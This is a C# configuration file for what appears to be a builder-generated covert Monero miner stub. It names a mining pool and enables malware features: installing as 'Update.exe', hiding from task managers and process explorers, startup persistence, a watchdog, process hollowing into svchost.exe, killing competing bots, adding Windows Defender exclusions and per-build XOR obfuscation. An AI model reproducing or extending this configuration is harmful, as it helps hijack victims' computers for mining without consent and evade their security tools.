namespace MinerStub;

// !! THIS FILE IS AUTO-GENERATED BY THE MINER BUILDER !!
// Do not edit manually — the builder overwrites it on every build.
// Commit only with placeholder values (wallet / token must be empty).

internal static class MinerConfig
{
    public const string PoolUrl          = "xmr-eu1.nanopool.org:14433";
    public const bool   PoolTls          = true;
    public const string Wallet           = "";        // set in builder
    public const string Password         = "x";
    public const string WorkerName       = "";
    public const string Algo             = "rx/0";
    public const int    MaxCpuIdle       = 75;
    public const int    MaxCpuActive     = 35;
    public const int    IdleThresholdSec = 90;
    public const string InstallName      = "Update.exe";
    public const string StealthProcs     = "taskmgr.exe,procexp.exe,procexp64.exe,systeminformer.exe,processhacker.exe";
    public const bool   EnableStartup    = true;
    public const bool   EnableSafeBoot   = false;
    public const bool   EnableWatchdog   = true;
    public const bool   DisableSleep     = true;
    public const bool   EnableHollowing  = true;
    public const string HollowTarget     = "svchost.exe";
    public const bool   EnableBotKiller  = true;
    public const bool   EnableDefenderExclusion = true;
    public const string StatsUrl         = "";
    public const string StatsToken       = "";        // set in builder
    public const string XorKey           = "";        // injected by builder (random per build)
}
